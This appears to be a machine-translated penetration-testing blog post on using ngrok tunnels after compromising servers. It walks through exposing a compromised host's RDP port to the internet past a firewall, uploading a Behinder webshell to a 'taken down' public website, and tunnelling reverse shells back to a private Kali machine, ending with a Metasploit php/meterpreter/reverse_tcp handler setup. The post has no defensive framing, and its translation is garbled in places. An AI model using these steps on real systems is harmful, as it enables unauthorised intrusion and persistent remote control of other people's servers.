Scenario 1: I got a shell, administrator rights, windows system, manually opened port 3389, nmap scanned port 3389 as a filter, suspected that it was blocked by the firewall, after many in-depth exchanges with Du Niang, I decided to use the ngrock tunnel. The server port 3389 is mapped to the public network, and then remote login.
1. Visit the official website of ngrok http://www.ngrok.cc/ to register an account
2. Buy this American, free, and particularly problem-prone free tunnel
3. Open the tunnel
The http/https protocol needs to have its own domain name, write the name and remote port as you like, just use it
The most important thing is the local port:
If you need to map port 80 to the public network, it is IP: 80
If you need to map port 3389 to the public network, it is IP: 3389
4. Confirm to open
5. Enter the tunnel management page
6. Click to enter the client download page, select the appropriate client to download
(My server is win64, so I downloaded win64)
7. Upload the downloaded client to the server, and then run
8. Enter the id number in the tunnel management page
9. The tunnel is successfully established
10. The web page also prompts to go online
11. Test: We tunneled port 3389 of the internal network to the public network, and used the public network address to log in to 3389
12. The login is successful, and port 3389 of the internal network is successfully mapped to the public network through the tunnel
Scenario 2: Take down a public network server, you need to bounce a shell to your kali, but your kali is a private address, internal network
IP, there is no way to receive the rebound shell, this time you can pass through the ngrok tunnel, map kali to the public network, and receive the rebound shell.
Scenario 3: Take down a public website, upload Bingxiema, and use Bingxiema's rebound shell function to bounce the shell to the kali virtual machine on your computer.
The ngrok configuration is as follows:
Download the linux 32-bit client to Kali, and run the ./sunny clientid tunnel id, so that ngrok will establish a link with the local Kali in the intranet
Ice Scorpion: Just add the free domain name here to the IP
kali: Install the prompts given by Bingscorpion to configure, then click on Bingscorpion to connect to me
root@silver:/tmp# msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > show options
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf exploit(multi/handler) > exploit success
